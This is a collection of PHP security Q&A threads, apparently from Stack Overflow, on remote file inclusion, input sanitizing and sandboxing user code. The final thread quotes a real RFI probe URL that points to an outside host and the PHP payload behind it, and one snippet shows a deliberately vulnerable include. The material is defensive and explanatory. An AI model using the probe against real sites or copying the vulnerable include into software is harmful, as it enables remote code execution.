PHP, RFI, and keeping things secure - php

I am working on a website where the user inputs a website domain name, e.g. http://www.mysite.com.
I have been reading about remote file inclusion (RFI), and it is pretty interesting. Simply by appending something like ?page=http://www.mysite.com/index.php? to a URL, I get some kind of error (500).
If I do the same on other people's WordPress/PHP sites, I also get an error.
I do not know whether this means the script was run, but how can I keep my input clean? I already use a regex, but I want the user to be able to enter any website and have it processed accordingly. I certainly do not want significant security holes anywhere in my script.
Good night here in Boston on the East Coast [EST]

The HTTP 500 error you're seeing sounds like something generated by mod_security, a module for Apache. mod_security scans all input against a set of security rules, one of which is probably checking for RFI. This is a first line of defense.
To protect against RFI, there are a few other things you can do. First, since PHP 5.2.0, there is an option called allow_url_include. When set to false, it causes PHP to throw an error whenever a file being included is a URL. Most people will want this setting set to false.
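If you want to confirm how your own server is configured, here is a small diagnostic sketch (not part of the original answer, just an illustration):

<?php
// Diagnostic sketch: ini_get() returns the current value as a string.
// An empty string or "0" means the option is off (the safe setting).
// allow_url_include is a system-level directive, so it is set in php.ini
// or the server config rather than at runtime.
var_dump(ini_get('allow_url_include')); // governs include/require of URLs
var_dump(ini_get('allow_url_fopen'));   // governs fopen()/file_get_contents() of URLs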
Additionally, there's sanitizing your input. There are a variety of ways to do it, such as using a regex, but you could also look at the filter extension. Just be sure to be strict enough; you wouldn't want someone to sneak in a ../../ and have a peek a level or two higher in the file hierarchy.
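For the "user enters a website address" case from the question, a rough validation sketch using the filter extension could look like this (the $_POST key name is made up):

<?php
// Accept only well-formed http(s) URLs and reject anything that smells like
// path traversal; everything else is refused outright.
$url = isset($_POST['site']) ? trim($_POST['site']) : '';

$valid  = filter_var($url, FILTER_VALIDATE_URL);
$scheme = $valid ? strtolower((string) parse_url($valid, PHP_URL_SCHEME)) : '';

if ($valid === false || !in_array($scheme, array('http', 'https'), true) || strpos($url, '..') !== false) {
    exit('Please enter a valid website address.');
}
// $valid is now a syntactically sound URL you can go on to process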
The safest, though sometimes very impractical, way to secure file access is to use a whitelist of the exact files that are allowed to be included.
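A minimal sketch of the whitelist approach (the page keys and file names here are made up):

<?php
// Map the expected "page" keys to known files; anything else falls back to home.
$allowed = array(
    'home'    => 'pages/home.php',
    'about'   => 'pages/about.php',
    'contact' => 'pages/contact.php',
);

$key = isset($_GET['page']) ? $_GET['page'] : 'home';
if (!isset($allowed[$key])) {
    $key = 'home';
}
include $allowed[$key];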

Related

Protecting against malicious users passing arrays as POST parameters into a PHP application

A user reported that changing our POST request (directly, using Live HTTP Headers) from notes to notes[] broke our PHP application and also exposed our full path (error reporting was on).
Short of going through our entire application and doing:
if (is_array($_POST['some_param'])) {
    die("Invalid parameter");
}
Is there a better way to protect against this type of attack?
Testing for invalid values makes for a nasty game of cat and mouse. Try the opposite pattern where you proceed only on expected types.
In your scenario, test to see if $_POST['some_param'] represents a single text value and only then proceed with processing the request.
Checking the expected type being passed around is the best way to go about it.
http://php.net/manual/en/reserved.variables.post.php
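A minimal sketch of that pattern (parameter name taken from the question):

<?php
// Proceed only when the parameter is present and is a plain string;
// arrays, objects and missing values are all rejected the same way.
if (!isset($_POST['some_param']) || !is_string($_POST['some_param'])) {
    header('HTTP/1.0 400 Bad Request');
    exit('Invalid parameter');
}

$notes = trim($_POST['some_param']);
// ... continue processing $notes as a single text value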
Turning off error reporting in a production environment is always helpful. You can always check your error logs through whatever server you're using (Apache, nginx, etc.).
As for checking whether POST variables are arrays: if you're worried about it, you can always use a header file included in all your scripts to iterate over $_POST and clean it up. This is called sanitizing your variables; there are many articles on the internet about how to go about it. Here is one that could help you understand it:
http://www.dreamhost.com/dreamscape/2013/05/22/php-security-user-validation-and-sanitization-for-the-beginner/
Sounds like you use notes in many different places, you don't have a single gateway (eg all routes through index.php), and you want to add some protection.
If so, I suggest using the auto_prepend_file configuration value to load in a script (call it say input-filters.php) that does something like:
$_POST = filter_input_array(INPUT_POST,
    ['notes' => ['filter' => FILTER_DEFAULT, 'flags' => FILTER_REQUIRE_SCALAR]]);
There's tons more you can do with filters, so do check out the examples.

How to secure sensitive PHP files that process Jquery data?

On my website, I have a search.php page that makes $.get requests to pages like search_data.php and search_user_data.php etc.
The problem is all of these files are located within my public html folder.
Someone could browse directly to www.mysite.com/search_user_data.php. All of the data it processes is properly escaped and handled, but on a professional level it feels inadequate to even have this file within public reach.
I have tried moving the sensitive files out of my public folder, but since jQuery makes $.get requests and passes variables in the URL, that doesn't work.
Does anyone know any methods to firmly secure these vulnerable pages?
What you describe is normal.
You have PHP files in your www directory that are reachable so that Apache (or your favored webserver) can read and process them.
If you move them out, you can't reach them anymore, so that isn't really an option.
After all, your PHP files for AJAX are just regular PHP files; the rest of your project likely contains PHP files too, right? They are no more or less at risk than any other script on your server.
Make sure you program "clean": think about evil requests while writing your PHP functions, not after writing them.
As you already did: correctly quote all incoming input that might hit a database or sensitive function.
You can add security checks on your incoming values and create an automated email if you detect someone trying evil stuff. So you'll likely receive a warning in such cases.
But on the downside: you'll regularly receive warnings anyway, because some companies automatically scan websites for possible bugs, and such scans will trigger the alert as well.
On top of writing your code as "secure" as you can, you may want to add a referer check in your code. That means your PHP file will only react if your website was given as referer when accessing it. That's enough to block 80% of the kids out there.
But on the downside: a few internet users do not send a referer at all, and some proxies filter it out. (I personally would ignore them; half the web breaks for them anyway.)
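A rough sketch of such a referer check (the domain is of course a placeholder); remember that the header is trivially spoofed, so treat it as a speed bump rather than real security:

<?php
// Only answer if the request claims to come from our own site.
$referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
$host    = parse_url($referer, PHP_URL_HOST);

if ($host !== 'www.mysite.com') {        // placeholder domain
    header('HTTP/1.0 403 Forbidden');    // also blocks clients that send no referer
    exit;
}
// ... normal AJAX handling below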
One more layer of protection can be added by htaccess, you can do most within PHP but it might still be of interest for you: http://httpd.apache.org/docs/2.0/howto/htaccess.html
You can generate a uid each time your page is loaded and store it in $_SESSION['uid']. You give this uid to JavaScript by doing:
var uid = <?php print $_SESSION['uid']; ?>;
Then you pass it with your GET request and compare it to your $_SESSION value:
if($_GET['uid'] != $_SESSION['uid']) // Stop with an error message or send a forbidden header.
If it's ok, do what you need.
It's not perfect since someone can request search.php and get the current uid, and then request the other pages, but it may be the best possible solution.
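Fleshed out a little (file names as in the question, the rest is a sketch), the endpoint side could look like this:

<?php
// search_user_data.php: reject requests that do not carry the per-session token.
// The token itself would be created once on search.php, for example with
// $_SESSION['uid'] = bin2hex(random_bytes(16));
// (random_bytes() needs PHP 7+, hash_equals() needs PHP 5.6+)
session_start();

if (!isset($_GET['uid'], $_SESSION['uid']) || !hash_equals((string) $_SESSION['uid'], (string) $_GET['uid'])) {
    header('HTTP/1.0 403 Forbidden');
    exit('Forbidden');
}

// ... token matches, run the actual search and echo the response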

No require, no include, no url rewriting, yet the script is executed without being in the url

I am trying to trace the flow of execution in some legacy code. We have a report being accessed with
http://site.com/?nq=showreport&action=view
This is the puzzle:
in index.php there is no $_GET['nq'] or $_GET['action'] (and no $_REQUEST either),
index.php, or any sources it includes, does not include showreport.php,
in .htaccess there is no URL rewriting,
yet, showreport.php gets executed.
I have access to cPanel (but no apache config file) on the server and this is live code I cannot take any liberty with.
What could be making this happen? Where should I look?
Update
Funny thing - I sent the client a link to this question in a status update to keep him in the loop; minutes later all access was revoked and the client informed me that the project is cancelled. I believe I have taken enough care not to leave any traces to where the code actually is ...
I am relieved this has been taken off me now, but I am also itching to know what it was!
Thank you everybody for your time and help.
There are "a hundreds" ways to parse a URL - in various layers (system, httpd server, CGI script). So it's not possible to answer your question specifically with the information you have got provided.
You leave a quite distinct hint "legacy code". I assume what you mean is, you don't want to fully read the code, understand it even that much to locate the piece of the application in question that is parsing that parameter.
It would be good however if you leave some hints "how legacy" that code is: Age, PHP version targeted etc. This can help.
It was not always that $_GET was used to access these values (same is true for $_REQUEST, they are cousins).
Let's take a look in the PHP 3 manual Mirror:
HTTP_GET_VARS
An associative array of variables passed to the current script via the HTTP GET method.
Is the script perhaps making use of this array? That's just a guess; this was a valid way to access these parameters for quite some time.
Anyway, this may not be what you are looking for. There was an often misunderstood and misused (literally abused) feature in PHP called register_globals (see the PHP manual). So you might just be searching for $nq.
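For illustration only (this is how register_globals behaved, not the actual code of your site): with that setting on, a request to /?nq=showreport&action=view would create globals $nq and $action automatically, so the dispatch could look as innocent as:

<?php
// Hypothetical legacy dispatch relying on register_globals (removed in PHP 5.4):
// $nq and $action simply "appear" as globals, with no $_GET access anywhere.
if (isset($nq, $action) && $nq === 'showreport' && $action === 'view') {
    include 'showreport.php';
}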
Next to that, there's always the request URI and the Apache / environment / CGI variables. See the link to the PHP 3 manual above; it lists many of those. Compare it with the current manual to get a broad understanding.
In any case, you might have grep or a multi-file search available (Eclipse has a nice built-in one if you need to inspect legacy code inside some IDE).
So at the end of the day you might just search for a string like nq, 'nq', "nq" or $nq and check what that brings up. String-based search is a good entry point into a codebase you don't know at all.
I'd install Xdebug and use its function trace to see, piece by piece, what it is doing.
EDIT:
Okay, just an idea, but... maybe your application is some kind of include hell, like the applications I'm sometimes forced to mess with at work? One file includes another, which includes another, and that includes the original file again... So maybe your index file includes some file that eventually causes showreport.php to get included?
Another EDIT:
Or, sometimes application devs didn't know what a $_GET variable was and parsed the URLs themselves, doing manual includes based on the parsed URLs.
I don't know exactly how it works, but I know that WordPress/SilverStripe uses its own URL rewriting to parse URLs and find posts/tags/etc. So the URL parsing may well be done in a PHP script.
Check your config files (php.ini and .htaccess), you may have auto_prepend_file set.
Check your crontab [sorry, I don't know where you would find it in cPanel]
- does the script fire at a specific time, or can you see that it definitely fires only when you request a specific page?
-sean
EDIT:
If crontab is out, take a look at index.php [and its includes] and look for code that either loops over the URL parameters without specifically naming "nq", or anything that might be parsing the query string [probably something like $_SERVER['QUERY_STRING']].
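For example, a legacy-style manual parse might look something like this (purely illustrative, not your actual code):

<?php
// Hypothetical hand-rolled dispatch: the literal string "nq" never appears,
// yet the parameter still drives which file gets included
// (which would itself be an include vulnerability, incidentally).
parse_str($_SERVER['QUERY_STRING'], $params);
foreach ($params as $name => $value) {
    if ($name === 'action') {
        continue;
    }
    // e.g. nq=showreport  =>  include "showreport.php"
    include $value . '.php';
}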
-sean
You should give debug_backtrace() (or debug_print_backtrace()) a try. The output is similar to an exception stack trace, so it should help you find out what is called when, and from where. If you can't run the application on a local development system, make sure that nobody else can see the output.
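A tiny probe along those lines (where exactly you drop it is up to you; showreport.php is the obvious candidate) could be:

<?php
// Temporary probe: log how this file was reached, without showing anything to visitors.
ob_start();
debug_print_backtrace();
error_log("showreport.php reached via:\n" . ob_get_clean());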
Are you sure you are looking at the right config or server? If you go to the URL above, you get an error page that seems to indicate the server is actually a Microsoft IIS server and not an Apache one.

Best way to allow user to inject and run php code

I've been thinking for a while about the idea of allowing users to inject code on a website and run it on the web server. It's not a new idea - many websites allow users to "test" their code online, such as http://ideone.com/.
For example, let's say we have a form containing a <textarea> element in which the user enters a piece of code and then submits it. The server reads the POST data, saves it as a PHP file, and require()s it surrounded by ob_*() output buffering handlers. The captured output is presented to the end user.
My question is: how to do it properly? Things that we should take into account [and possible solutions]:
security, user is not allowed to do anything evil,
php.ini's disable_functions
stability, user is not allowed to kill the webserver by submitting while(true){},
set_time_limit()
performance, server returns answer in an acceptable time,
control, user can do anything that matches previous points.
I would prefer PHP-oriented answers, but general approach is also welcome. Thank you in advance.
I would think about this problem one level higher, above and outside of the web server. Have a very unprivileged, jailed, chroot'ed standalone process for running these uploaded PHP scripts; then it doesn't matter which PHP functions are enabled or not, because they will fail based on permissions and lack of access.
Have a parent process that monitors how long the above-mentioned "worker" process has been running; if it's been too long, kill it and report a timeout error back to the end user.
Obviously there are many implementation details to work out as to how to run this system asynchronously outside of the browser request, but I think it would provide a pretty secure way to run your untrusted PHP scripts.
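A very rough sketch of the worker/timeout part in PHP (this is not a complete sandbox; the chroot/jail, the unprivileged user, and the restrictive php.ini path are all assumptions that have to be set up separately):

<?php
// Save the submitted code to a temp file and run it in a separate PHP process.
// /etc/php/sandbox-php.ini is hypothetical: it would carry disable_functions,
// open_basedir, memory limits and so on for the worker.
$file = tempnam(sys_get_temp_dir(), 'job_');
file_put_contents($file, isset($_POST['code']) ? $_POST['code'] : '');

$cmd  = 'php -c /etc/php/sandbox-php.ini ' . escapeshellarg($file);
$proc = proc_open($cmd, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $pipes);

stream_set_blocking($pipes[1], false);
$deadline = time() + 5;                      // hard wall-clock limit for the worker
$output   = '';

while (true) {
    $output .= stream_get_contents($pipes[1]);
    $status  = proc_get_status($proc);
    if (!$status['running']) {
        break;                               // worker finished on its own
    }
    if (time() > $deadline) {
        proc_terminate($proc, 9);            // took too long: kill it
        $output .= "\n[timed out]";
        break;
    }
    usleep(100000);
}

proc_close($proc);
unlink($file);
echo '<pre>' . htmlspecialchars($output) . '</pre>';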
Wouldn't disabling functions in your server's ini file limit some of the functions of the application itself?
I think you have to do some hardcore sanitization on the POST data and strip "illegal" code there. I think doing that with the addition of the other methods you describe might make it work.
Just remember. Sanitize the everloving daylight out of that POST data.

What bug does this hacker want to exploit?

A guy called ShiroHige is trying to hack my website.
He tried to open a page with this parameter:
mysite/dir/nalog.php?path=http://smash2.fileave.com/zfxid1.txt???
If you look at that text file it is just a die(),
<?php /* ZFxID */ echo("Shiro"."Hige"); die("Shiro"."Hige"); /* ZFxID */ ?>
So what exploit is he trying to use (WordPress?)?
Edit 1:
I know he is trying to use RFI.
Is there some popular script that is exploitable this way (Drupal, phpBB, etc.)?
An obvious one, just unsanitized include.
He is checking if the code gets executed.
If he finds his signature in a response, he will know that your site is ready to run whatever code he sends.
To prevent such attacks, one has to strictly sanitize filenames if they happen to be sent via HTTP requests.
A quick and cheap validation can be done using the basename() function:
if (empty($_GET['page'])) {
    $_GET['page'] = "index";            // default page name; ".php" is appended below
}
// basename() strips any directory part, so ../../ tricks and URLs are neutralized
$page = $modules_dir . basename($_GET['page']) . ".php";
if (!is_readable($page)) {
    header("HTTP/1.0 404 Not Found");
    $page = "404.html";
}
include $page;
or using some regular expression.
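A regular-expression variant of the same idea (a sketch; adjust the pattern and paths to your own layout):

<?php
// Accept only simple page names such as "about" or "contact-us";
// anything with slashes, dots or a URL in it fails the pattern.
$page = isset($_GET['page']) ? $_GET['page'] : 'index';

if (!preg_match('/^[a-z0-9_-]+$/i', $page)) {
    header('HTTP/1.0 400 Bad Request');
    exit('Invalid page');
}

include $modules_dir . $page . '.php';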
There is also an extremely useful PHP configuration directive called
allow_url_include
which is set to off by default in modern PHP versions. So it protects you from such attacks automatically.
The vulnerability the attacker is aiming for is probably some kind of remote file inclusion, exploiting PHP's include and similar functions/constructs that allow loading a (remote) file and executing its contents:
Security warning
Remote file may be processed at the remote server (depending on the file extension and the fact if the remote server runs PHP or not) but it still has to produce a valid PHP script because it will be processed at the local server. If the file from the remote server should be processed there and outputted only, readfile() is much better function to use. Otherwise, special care should be taken to secure the remote script to produce a valid and desired code.
Note that using readfile() only avoids executing the loaded file. It is still possible to exploit it to load other content that is then printed directly to the user. This can be used to print the plain contents of arbitrary files on the local file system (i.e. path traversal) or to inject code into the page (i.e. code injection). So the only real protection is to validate the parameter value before using it.
See also OWASP’s Development Guide on “File System – Includes and Remote files” for further information.
It looks like the attack is designed to print out "ShiroHige" on vulnerable sites.
The idea being that if you use include but do not sanitize your input, then the PHP in this text file is executed. If this works, he can send any PHP code to your site and execute it.
A list of similar files can be found here. http://tools.sucuri.net/?page=tools&title=blacklist&detail=072904895d17e2c6c55c4783df7cb4db
He's trying to get your site to run his file. This would probably be an XSS attack? Not quite familiar with the terms (Edit: RFI - Remote file inclusion).
Odds are he doesn't know what he's doing. If there were a known way to get into WordPress like this, it would be very public by now.
I think it's only a first test to see whether your site is vulnerable to external includes. If the echo output is printed, he knows it's possible to inject code.
You're not giving much detail on the situation and leaving a lot to the imagination.
My guess is that he's trying to exploit allow_url_fopen. And right now he's just testing code to see what he can do. This is the first wave!
I think it is just a malicious URL. As soon as I entered it into my browser, Avast antivirus flagged it as malicious. So that PHP code may be deceiving, or he may just be testing. Another possibility is that the hacker has no bad intentions and just wants to show that he could get past your security.
